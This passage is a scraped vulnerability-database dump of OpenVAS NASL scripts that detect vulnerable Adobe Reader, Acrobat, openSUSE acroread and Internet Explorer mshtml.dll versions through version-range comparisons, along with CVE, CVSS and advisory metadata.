test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5098\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.17116\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21318\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18746\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22994\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19393\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23461\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17184\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21392\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18020\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22184\")){\n security_message(0);\n }\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:50", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to\n multiple unspecified vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-02-19T00:00:00", "id": "OPENVAS:1361412562310803419", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803419", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_feb13_macosx.nasl 27950 2013-02-19 19:32:21Z feb$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803419\");\n script_version(\"$Revision: 11865 $\");\n script_bugtraq_id(57931, 57947);\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-19 19:32:21 +0530 (Tue, 19 Feb 2013)\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52196\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.4 on Mac OS X\n\n Adobe Acrobat X Version 10.x prior to 10.1.6 on Mac OS X\n\n Adobe Acrobat XI Version 11.x prior to 11.0.02 on Mac OS X\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to unspecified errors.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 9.5.4 or X (10.1.6) or XI (11.0.02) or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to\n multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n code or cause a denial of service via a crafted PDF document.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nacrobatVer = get_kb_item(\"Adobe/Acrobat/MacOSX/Version\");\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.3\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.5\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.01\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:22", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-02-19T00:00:00", "id": "OPENVAS:1361412562310803415", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803415", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_feb13_win.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803415\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_bugtraq_id(57931, 57947);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-19 18:24:49 +0530 (Tue, 19 Feb 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaws are due to unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code or cause\na denial of service via a crafted PDF document.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.4 on Windows\n\nAdobe Reader X Version 10.x prior to 10.1.6 on Windows\n\nAdobe Reader XI Version 11.x prior to 11.0.02 on Windows\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.5.4, 10.1.6, 11.0.02 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52196\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^(9|10|11)\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.3\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.5\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.01\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:59:30", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to\nmultiple unspecified vulnerabilities.", "modified": "2017-12-21T00:00:00", "published": "2013-02-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=803418", "id": "OPENVAS:803418", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_feb13_win.nasl 27950 2013-02-19 19:28:21Z feb$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary\ncode or cause a denial of service via a crafted PDF document.\n\nImpact level: System/Application\";\n\ntag_affected = \"Adobe Acrobat Version 9.x prior to 9.5.4 on Windows\n\nAdobe Acrobat X Version 10.x prior to 10.1.6 on Windows\n\nAdobe Acrobat XI Version 11.x prior to 11.0.02 on Windows\";\n\ntag_insight = \"The flaws are due to unspecified errors.\";\n\ntag_solution = \"Upgrade to version 9.5.4 or X (10.1.6) or XI (11.0.02) or later,\nFor updates refer to http://www.adobe.com\";\n\ntag_summary = \"This host is installed with Adobe Acrobat and is prone to\nmultiple unspecified vulnerabilities.\";\n\nif(description)\n{\n script_id(803418);\n script_version(\"$Revision: 8210 $\");\n script_bugtraq_id(57931, 57947);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-19 19:28:21 +0530 (Tue, 19 Feb 2013)\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/52196\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_xref(name : \"URL\" , value : \"http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Installed\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n# Check Adobe Acrobat version is 9.x <= 9.5.3, 10.x <= 10.1.5 and 11.x <= 11.0.01\nif( version_in_range( version:vers, test_version:\"9.0\", test_version2: \"9.5.3\" ) ||\n version_in_range( version:vers, test_version:\"10.0\", test_version2: \"10.1.5\") ||\n version_in_range( version:vers, test_version:\"11.0\", test_version2: \"11.0.01\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"9.5.4 / X (10.1.6) / XI (11.0.02)\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:40:48", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2013-03-11T00:00:00", "id": "OPENVAS:1361412562310850409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850409", "title": "openSUSE: Security Advisory for acroread (openSUSE-SU-2013:0335-1)", "type": "openvas", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850409\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:15 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0335-1\");\n script_name(\"openSUSE: Security Advisory for acroread (openSUSE-SU-2013:0335-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'acroread'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.1\");\n\n script_tag(name:\"affected\", value:\"acroread on openSUSE 12.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"acroread was updated to 9.5.4 to fix remote code execution\n problems. (CVE-2013-0640, CVE-2013-0641)\n\n More information can be found at the linked references.\");\n\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2013-02/msg00021.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-07.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"acroread-cmaps\", rpm:\"acroread-cmaps~9.4.1~3.17.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"acroread-fonts-ja\", rpm:\"acroread-fonts-ja~9.4.1~3.17.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"acroread-fonts-ko\", rpm:\"acroread-fonts-ko~9.4.1~3.17.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"acroread-fonts-zh_CN\", rpm:\"acroread-fonts-zh_CN~9.4.1~3.17.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"acroread-fonts-zh_TW\", rpm:\"acroread-fonts-zh_TW~9.4.1~3.17.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.5.4~3.17.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"acroread-browser-plugin\", rpm:\"acroread-browser-plugin~9.5.4~3.17.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-12T11:14:32", "bulletinFamily": "scanner", "description": "Check for the Version of acroread", "modified": "2017-12-08T00:00:00", "published": "2013-03-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850408", "id": "OPENVAS:850408", "title": "SuSE Update for acroread openSUSE-SU-2013:0342-1 (acroread)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0342_1.nasl 8045 2017-12-08 08:39:37Z santu $\n#\n# SuSE Update for acroread openSUSE-SU-2013:0342-1 (acroread)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"acroread was updated to 9.5.4 to fix remote code execution\n problems. (CVE-2013-0640, CVE-2013-0641)\n\n More information can be found on:\n http://www.adobe.com/support/security/bulletins/apsb13-07.html\n\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\";\n\n\ntag_affected = \"acroread on openSUSE 11.4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00023.html\");\n script_id(850408);\n script_version(\"$Revision: 8045 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:39:37 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:31 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2013:0342_1\");\n script_name(\"SuSE Update for acroread openSUSE-SU-2013:0342-1 (acroread)\");\n\n script_summary(\"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.5.4~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"acroread-browser-plugin\", rpm:\"acroread-browser-plugin~9.5.4~14.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:26", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to\nmultiple unspecified vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2013-02-19T00:00:00", "id": "OPENVAS:1361412562310803418", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803418", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_feb13_win.nasl 27950 2013-02-19 19:28:21Z feb$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803418\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_bugtraq_id(57931, 57947);\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-02-19 19:28:21 +0530 (Tue, 19 Feb 2013)\");\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/52196\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_xref(name:\"URL\", value:\"http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Installed\");\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.4 on Windows\n\nAdobe Acrobat X Version 10.x prior to 10.1.6 on Windows\n\nAdobe Acrobat XI Version 11.x prior to 11.0.02 on Windows\");\n script_tag(name:\"insight\", value:\"The flaws are due to unspecified errors.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 9.5.4 or X (10.1.6) or XI (11.0.02) or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to\nmultiple unspecified vulnerabilities.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\ncode or cause a denial of service via a crafted PDF document.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version:vers, test_version:\"9.0\", test_version2: \"9.5.3\" ) ||\n version_in_range( version:vers, test_version:\"10.0\", test_version2: \"10.1.5\") ||\n version_in_range( version:vers, test_version:\"11.0\", test_version2: \"11.0.01\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"9.5.4 / X (10.1.6) / XI (11.0.02)\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:11:06", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to\nmultiple unspecified vulnerabilities.", "modified": "2017-05-12T00:00:00", "published": "2013-02-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=803419", "id": "OPENVAS:803419", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_feb13_macosx.nasl 27950 2013-02-19 19:32:21Z feb$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 Feb13 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary\ncode or cause a denial of service via a crafted PDF document.\n\nImpact level: System/Application\";\n\ntag_affected = \"Adobe Acrobat Version 9.x prior to 9.5.4 on Mac OS X\nAdobe Acrobat X Version 10.x prior to 10.1.6 on Mac OS 